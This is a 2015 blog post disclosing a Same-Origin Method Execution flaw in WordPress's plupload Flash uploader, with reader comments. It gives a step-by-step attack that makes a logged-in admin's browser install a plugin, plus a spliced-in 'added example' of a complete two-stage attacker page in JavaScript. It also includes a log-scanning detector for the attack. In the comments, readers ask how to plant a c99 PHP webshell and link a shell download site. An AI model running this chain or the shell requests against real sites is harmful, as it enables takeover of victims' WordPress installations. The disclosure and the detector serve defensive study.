Wednesday, 22 April 2015

plupload - Same-Origin Method Execution [Wordpress 3.9 - 4.1.1]

This January I found and reported an XSS vulnerability in plupload that affects WordPress 3.9 through 4.1.1. Since there was no way to control the arguments of the function being called, the "only" thing we could do with this issue was Same-Origin Method Execution (SOME): calling an existing same-origin JavaScript method by name, without arguments.

Before you read the technical details, update your WordPress / plupload first.

If you dig a bit into the Flash plupload 2.1.2 source code, you will notice something interesting in the _init() function:


...and in _fireEvent():


So we can manipulate the target GET parameter to execute JavaScript functions, but the value may contain only alphanumeric characters and dots: no parentheses, quotes, or operators, so no arguments and no arbitrary script, only a dotted property path that ends in a method. That is still useful. Against a victim who is logged in to WordPress as an administrator, the scenario goes like this:

1. In the first tab, open a new window with target _blank and the URL http://hostname/proxy.php (a page on the attacker's own host).
2. Then redirect the first tab to http://target-wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=google-analytics-dashboard-for-wp&section=description - of course, you can use any other plugin-install page.
3. proxy.php in the second tab sleeps for a few seconds and then redirects to the vulnerable plupload SWF on target-wordpress, with the target parameter set to the dotted path below. By now both tabs are on the target-wordpress origin, so window.opener (the first tab) is same-origin and the SWF ends up calling this function, which clicks the install button on the plugin page:


window.opener.document.body.lastChild.previousElementSibling.previousElementSibling.previousElementSibling.lastChild.click()

4. ...aaaand the plugin is installed now. ;-)
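The four steps above as one working attacker page, written as an added example rather than code from the original post or from plupload: a static proxy.html with a setTimeout stands in for the sleeping proxy.php, the hostnames http://hostname and http://target-wordpress are the post's placeholders, and the SWF path /wp-includes/js/plupload/Moxie.swf is an assumption about the WordPress layout that the post does not state. The filter check mirrors the alphanumerics-and-dots restriction the post describes.

```javascript
// Added example (not from the original post or plupload): the two-tab SOME chain.
// Assumed: SWF path /wp-includes/js/plupload/Moxie.swf; origins are placeholders.

// The post states that only alphanumerics and dots survive plupload's target check.
const TARGET_RE = /^[A-Za-z0-9.]+$/;

function isAllowedTarget(expr) {
  return TARGET_RE.test(expr);
}

// URL the popup is sent to. `methodPath` must resolve, inside the SWF's page,
// to a callable; ExternalInterface.call() then invokes it with no arguments the
// attacker controls, which is why this bug yields a SOME rather than a full XSS.
function buildSomeUrl(targetOrigin, swfPath, methodPath) {
  if (!isAllowedTarget(methodPath)) {
    throw new Error('target rejected by the [A-Za-z0-9.] filter: ' + methodPath);
  }
  return targetOrigin + swfPath + '?target=' + encodeURIComponent(methodPath);
}

// DOM walk from step 3: from the popup, window.opener is the first tab, which by
// then shows the plugin-information page, so this path reaches its install button.
const INSTALL_BUTTON_PATH =
  'window.opener.document.body.lastChild.previousElementSibling' +
  '.previousElementSibling.previousElementSibling.lastChild.click';

const PLUGIN_PAGE =
  '/wp-admin/plugin-install.php?tab=plugin-information' +
  '&plugin=google-analytics-dashboard-for-wp&section=description';

// Stage 1 (attacker landing page, first tab): open the popup on the attacker's
// origin first, then move this tab to WordPress. The popup keeps its opener
// reference across that navigation.
function stageOne(attackerOrigin, targetOrigin) {
  window.open(attackerOrigin + '/proxy.html', '_blank');
  window.location.href = targetOrigin + PLUGIN_PAGE;
}

// Stage 2 (proxy.html in the popup): give the first tab time to finish loading,
// then navigate the popup itself to the SWF on the WordPress origin. Once both
// documents live on targetOrigin, the SWF's call into window.opener is same-origin.
function stageTwo(targetOrigin, swfPath, delayMs) {
  setTimeout(function () {
    window.location.href = buildSomeUrl(targetOrigin, swfPath, INSTALL_BUTTON_PATH);
  }, delayMs);
}

// Browser entry point; skipped when this file runs under Node.
if (typeof window !== 'undefined') {
  const ATTACKER = 'http://hostname';              // placeholder attacker origin
  const TARGET = 'http://target-wordpress';        // placeholder victim origin
  const SWF = '/wp-includes/js/plupload/Moxie.swf'; // assumed SWF path
  if (window.location.pathname.endsWith('/proxy.html')) {
    stageTwo(TARGET, SWF, 5000);
  } else {
    stageOne(ATTACKER, TARGET);
  }
}
```

Serve the same file as both the landing page and proxy.html on the attacker host; the pathname check decides which stage runs. The delay exists only because the popup must not load the SWF before the first tab has finished navigating to the WordPress origin, otherwise window.opener is still the attacker's cross-origin page and the call is blocked.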

Of course, this can be automated further and made faster to install malicious or vulnerable plugins that, after successful exploitation, give us a webshell or anything else needed to own the machine. In my opinion this can be really dangerous.

PoC: http://ropchain.org/poc/wordpress/
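For defenders, the SOME request leaves a distinctive trace in the web server log: the plupload SWF fetched as a top-level document, with a foreign referer and a target parameter that walks into window.opener. The scanner below is an added example, not part of the original post; the Combined Log Format lines are constructed for it, and the SWF path /wp-includes/js/plupload/Moxie.swf is assumed from the WordPress layout rather than taken from the post.

```javascript
// Added example, not from the original post: flag plupload SWF loads whose
// `target` parameter reaches into another browsing context (the SOME pattern).
// Log lines are constructed; the SWF path is an assumption about WordPress.

const SAMPLE_LOG = [
  // ordinary admin browsing of the plugin page: not flagged
  '203.0.113.7 - - [22/Apr/2015:10:15:30 +0000] "GET /wp-admin/plugin-install.php?tab=plugin-information&plugin=google-analytics-dashboard-for-wp&section=description HTTP/1.1" 200 18211 "http://target-wordpress/wp-admin/" "Mozilla/5.0"',
  // SWF loaded by the media uploader, no target parameter: not flagged
  '203.0.113.7 - - [22/Apr/2015:10:15:31 +0000] "GET /wp-includes/js/plupload/Moxie.swf HTTP/1.1" 200 13241 "http://target-wordpress/wp-admin/upload.php" "Mozilla/5.0"',
  // the SOME request: SWF fetched from a foreign referer with a window.opener chain
  '203.0.113.7 - - [22/Apr/2015:10:15:36 +0000] "GET /wp-includes/js/plupload/Moxie.swf?target=window.opener.document.body.lastChild.previousElementSibling.previousElementSibling.previousElementSibling.lastChild.click HTTP/1.1" 200 13241 "http://hostname/proxy.php" "Mozilla/5.0"'
];

// Combined Log Format: ip ident user [time] "method path proto" status size "referer" "ua"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

// Decode a query component without letting a malformed %-sequence abort the scan.
function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { return s; }
}

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const qIdx = m[4].indexOf('?');
  const path = qIdx < 0 ? m[4] : m[4].slice(0, qIdx);
  const query = qIdx < 0 ? '' : m[4].slice(qIdx + 1);
  const params = {};
  for (const kv of query.split('&')) {
    if (!kv) continue;
    const eq = kv.indexOf('=');
    const key = eq < 0 ? kv : kv.slice(0, eq);
    const val = eq < 0 ? '' : kv.slice(eq + 1);
    params[safeDecode(key)] = safeDecode(val);
  }
  return { ip: m[1], time: m[2], method: m[3], path: path, params: params,
           status: Number(m[5]), referer: m[6], ua: m[7] };
}

// A plupload instance has no reason to address other browsing contexts; a target
// that names window/opener/parent/top/document is the SOME signature.
const SOME_TARGET_RE = /(^|\.)(window|opener|parent|top|document)(\.|$)/;

function isSomeAttempt(req) {
  if (!req || !/\/plupload\/[^/]+\.swf$/i.test(req.path)) return false;
  const target = req.params.target;
  return typeof target === 'string' && SOME_TARGET_RE.test(target);
}

// Returns one record per suspicious request, with the fields an analyst needs next.
function scanLog(lines) {
  return lines.map(parseLine).filter(isSomeAttempt).map(function (r) {
    return { ip: r.ip, time: r.time, target: r.params.target, referer: r.referer };
  });
}
```

Run scanLog over the real access log to get the client IP, timestamp, referer and the exact method path that was invoked; the referer on a foreign host and the .click or .submit at the end of the chain are what distinguish an exploitation attempt from a stray SWF fetch.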

18 comments:

  1. This comment has been removed by the author.

  2. Where is the proxy.php script, please?

    Replies
    1. As mentioned, it just sleeps for a few seconds and does a redirect.



      Simple as that. :)

    2. http://pastebin.com/WuJxSgBH

  3. This comment has been removed by the author.

  4. Replies
    1. Which browser do you use?

      I believe that you're logged in as admin in WordPress during the test? ;-)

  5. I use FF.
    I'm not logged in :) I thought this was a fail to 'hack' a WP website ...

  6. Can I get the vulnerable flash file? I am not able to reproduce this.

    Replies
    1. You can find it by downloading an archived WordPress version (like 4.1.1).

    2. I tried on those older versions of WordPress only, but it is not working; I also noticed small changes in those flash files compared to the snippet given above in your blog, so I thought maybe the flash file was changed. Can you share your email ID, please?

    3. It opens two tabs but the plugin is not getting installed; not sure what I am missing.

    4. DD - try to DM me on Twitter or visit http://ropchain.org/ for my e-mail.

  7. How would this look if I wanted to install a shell, let's say
    shell c99?
    https://r57.gen.tr/1464020527-c99.html

  8. https://r57.gen.tr/1464020527-c99.html
    wp-admin/plugin-install.php?tab=plugin-information&plugin=google-analytics-dashboard-for-wp&section=description

    How do I make it upload a PHP shell? That's not listed on the WordPress plugins website, lol?
